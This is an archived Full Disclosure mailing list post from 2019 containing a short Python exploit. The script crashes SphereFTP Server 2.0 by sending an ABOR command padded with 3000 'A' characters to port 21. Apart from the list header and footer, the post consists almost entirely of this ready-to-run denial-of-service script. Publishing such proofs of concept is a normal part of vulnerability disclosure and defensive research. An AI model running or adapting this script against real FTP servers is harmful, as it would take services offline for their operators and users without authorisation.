[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] SphereFTP 2.0 Denial Of Service
From:       Sachin Wagh <wsachin092 () gmail ! com>
Date:       2019-04-04 4:45:54
Message-ID: CALCpQr8mH6qNfeBUq+YUTOY8j-cg2G5zAF+8zFhBLGtx8GPrEw () mail ! gmail ! com
[Download RAW message or body]

#!/usr/bin/python
# Exploit Title: SphereFTP Server v2.0 Remote Denial of Service
Vulnerability
# Date: 2019-31-03
# Exploit Author: Sachin Wagh (@tiger_tigerboy)
# Software Link: http://www.menasoft.com/sphereftp/sphereftp_win32_v20.zip
# Tested on: Windows 10 64-bit

import socket
import sys

evil = "A"*3000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.56.1',21))

s.recv(1024)
s.send('ABOR '+evil+'\r\n')
s.recv(1024)
s.close

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic